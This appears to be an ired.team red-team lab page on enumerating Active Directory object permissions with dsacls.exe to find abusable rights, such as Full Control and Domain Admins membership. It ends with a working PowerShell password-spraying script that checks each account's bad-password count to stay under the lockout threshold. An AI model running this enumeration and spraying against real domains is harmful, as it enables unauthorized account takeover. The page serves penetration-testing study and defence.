> For the complete documentation index, see [llms.txt](https://www.ired.team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions.md).

# Enumerating AD Object Permissions with dsacls

It is possible to use a native windows binary (in addition to powershell cmdlet `Get-Acl`) to enumerate Active Directory object security persmissions. The binary of interest is `dsacls.exe`.

Dsacls allows us to display or modify permissions (ACLS) of an Active Directory Domain Services (AD DS).

## Execution

Let's check if user `spot` has any special permissions against user's `spotless` AD object:

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
```

{% endcode %}

Nothing useful:

![](/files/-LaN7itzG7az7P-wRr6s)

Let's give user spot `Reset Password` and `Change Password` permissions on `spotless` AD object:

![](/files/-LaN7_JUpqnM0gcxouwl)

...and try the command again:

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "spot"
```

{% endcode %}

![](/files/-LaN7R50_E37uFhKaILH)

### Full Control

All well known (and abusable) AD object permissions should be sought here. One of them is `FULL CONTROL`:

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=spotless,cn=users,dc=offense,dc=local" | select-string "full control"
```

{% endcode %}

![](/files/-LaN9WENW2egvrpo8X9K)

### Add/Remove self as member

{% code title="attacker\@victim" %}

```csharp
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" | select-string "spotless"
```

{% endcode %}

![](/files/-LaNAHL_wSGsVIE5kfa3)

### WriteProperty/ChangeOwnerShip

![](/files/-LaNAksNf4H3bPs9BT0t)

Enumerating AD object permissions this way does not come in a nice format that can be piped between powershell cmd-lets, but it's still something to keep in mind if you do not the ability to use tools like powerview or ActiveDirectory powershell cmdlets or if you are trying to `LOL`.

For more good privileges to be abused:

{% content-ref url="/pages/-LTx64XAYznr7BOWOADR" %}
[Privileged Accounts and Token Privileges](/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges.md)
{% endcontent-ref %}

{% content-ref url="/pages/-LQimOasCuAaGC6hgChU" %}
[Abusing Active Directory ACLs/ACEs](/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces.md)
{% endcontent-ref %}

## Password Spraying Anyone?

As a side note, the `dsacls` binary could be used to do LDAP password spraying as it allows us to bind to an LDAP session with a specified username and password:

{% code title="incorrect logon" %}

```csharp
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:1234567
```

{% endcode %}

![Logon Failure](/files/-LaNCrJyr0IcdJ09FfvC)

{% code title="correct logon" %}

```csharp
dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:spotless@offense.local /passwd:123456
```

{% endcode %}

![Logon Successful](/files/-LaND3ClUvQm32WwdWmL)

### Dirty POC idea for Password Spraying:

{% code title="attacker\@victim" %}

```csharp
$domain = ((cmd /c set u)[-3] -split "=")[-1]
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
$password = "123456"

# (Get-Content users.txt)
"krbtgt","spotless" | % {
    $badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
    if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
        $isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:$_@offense.local /passwd:$password | select-string -pattern "Invalid Credentials"
        if ($isInvalid -match "Invalid") {
            Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
        } else {
            Write-Host "[+] Working Credentials for $_ : $password" -foreground green
        }        
    }
}
```

{% endcode %}

![](/files/-LaNQokIjU3XkqUj39tP)

## References

{% embed url="<https://support.microsoft.com/en-gb/help/281146/how-to-use-dsacls-exe-in-windows-server-2003-and-windows-2000>" %}
